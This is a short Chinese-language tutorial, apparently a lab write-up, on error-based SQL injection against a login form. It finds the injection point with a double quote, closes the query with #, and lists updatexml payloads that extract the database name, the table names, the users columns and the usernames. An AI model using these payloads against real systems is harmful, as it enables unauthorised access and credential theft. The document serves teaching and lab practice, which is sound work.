目錄

1：分析

找閉合符：

2：開始注入

報錯注入：

注入數據庫名：

注入表名：

注入列名：

注入具體值：

---

1：分析

????????經過我們的實驗發現當我們輸入的密碼后面存在雙引號時會報錯，由此可以發現注入點在此處。

找閉合符：

當我們輸入正確的賬號并在后面加上#后，可以成功登錄，由此我們可以使用#進行閉合。

2：開始注入

? ? ? ? 因為當我們輸入的sql語句出錯時web界面會將錯誤爆出來，所以我們可以使用報錯注入的方式進行注入。

? ? ? ? 在賬號輸入欄進行注入。

? ? ? ? ? ?

報錯注入：

注入數據庫名：

admin" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

注入表名：

admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

注入列名：

通過觀察可以知道最有可能存放敏感信息的表為users表，所以我們將users表的信息注入出來。

admin " and ?updatexml(1,concat(0x7e,(select ?group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),0x7e),1) #

注入具體值：

? ? ? ? 我們已經注入出來了列名，現在我們將username和password注入出來。

admin" and updatexml(1,substr(concat(0x7e,(select group_concat(username) from users),0x7e),1,32),1)#

到此我們就成功的注入了，想要注入其他的值只需要重復上面的操作即可。

? ? ?????????